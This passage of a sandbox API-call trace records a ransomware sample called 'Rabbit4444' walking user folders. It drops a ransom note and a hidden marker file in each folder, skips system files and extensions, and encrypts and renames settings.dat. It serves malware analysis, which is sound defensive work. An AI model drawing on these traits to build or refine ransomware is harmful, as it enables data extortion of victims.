[0065.078] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.078] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.078] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.078] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf01b523f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf01b523f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf01db456, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.078] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.078] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.078] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf01b523f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf01b523f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf01db456, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.078] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0065.078] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.078] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.078] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.078] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.079] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.079] CloseHandle (hObject=0x2cc) returned 1 [0065.079] CloseHandle (hObject=0x2a0) returned 1 [0065.079] GetCurrentThreadId () returned 0xd98 [0065.079] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0065.079] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData" [0065.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125488 | out: hHeap=0xe0000) returned 1 [0065.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0065.079] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData" [0065.079] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\" [0065.079] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0065.079] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.080] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.083] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.084] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.084] CloseHandle (hObject=0x2a0) returned 1 [0065.084] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData") returned 108 [0065.084] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.084] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf01db456, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.085] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.085] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.085] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.085] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.085] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf01db456, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.085] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.085] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.085] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.085] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.085] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.085] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf01db456, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf01db456, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf01db456, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.085] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.085] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.085] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf01db456, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf01db456, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf01db456, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.085] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.085] lstrcpyW (in: lpString1=0x130ec12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.085] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.086] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.086] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.086] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.086] CloseHandle (hObject=0x2cc) returned 1 [0065.086] CloseHandle (hObject=0x2a0) returned 1 [0065.086] GetCurrentThreadId () returned 0xd98 [0065.086] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0065.086] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings" [0065.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0065.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0065.086] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings" [0065.087] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\" [0065.087] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0065.087] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.101] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.104] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.104] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.105] CloseHandle (hObject=0x2a0) returned 1 [0065.105] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings") returned 103 [0065.105] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.105] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x70280da4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf020171c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.105] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.105] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.105] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.105] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x70280da4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf020171c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.105] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.105] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.105] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.105] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.106] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.106] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf01db456, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf01db456, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf020171c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.106] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.106] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.106] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70280da4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x70280da4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x70280da4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0065.106] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0065.106] lstrcpyW (in: lpString1=0x130ec08, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0065.106] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0065.107] lstrlenW (lpString="roaming.lock") returned 12 [0065.107] lstrlenW (lpString="Rabbit4444") returned 10 [0065.107] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0065.107] lstrlenW (lpString=".dll") returned 4 [0065.107] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0065.107] lstrlenW (lpString=".lnk") returned 4 [0065.107] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0065.107] lstrlenW (lpString=".ini") returned 4 [0065.107] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0065.107] lstrlenW (lpString=".sys") returned 4 [0065.107] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0065.107] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0065.107] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.107] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.107] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0065.108] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0065.108] lstrcpyW (in: lpString1=0x130ec08, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0065.108] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0065.108] lstrlenW (lpString="settings.dat") returned 12 [0065.108] lstrlenW (lpString="Rabbit4444") returned 10 [0065.108] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0065.108] lstrlenW (lpString=".dll") returned 4 [0065.108] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0065.108] lstrlenW (lpString=".lnk") returned 4 [0065.108] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0065.108] lstrlenW (lpString=".ini") returned 4 [0065.108] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0065.108] lstrlenW (lpString=".sys") returned 4 [0065.108] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0065.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.109] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.109] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15641953403) returned 1 [0065.109] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0065.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0065.109] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0065.109] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0065.110] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0065.112] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11df28 [0065.112] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0065.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11df28 | out: hHeap=0xe0000) returned 1 [0065.112] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0065.112] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11df28 [0065.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0065.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11df28 | out: hHeap=0xe0000) returned 1 [0065.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0065.112] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15642309770) returned 1 [0065.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0065.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0065.112] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.113] CloseHandle (hObject=0x27c) returned 1 [0065.113] CloseHandle (hObject=0x2cc) returned 1 [0065.113] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 127 [0065.113] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0065.115] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0065.115] FindClose (in: 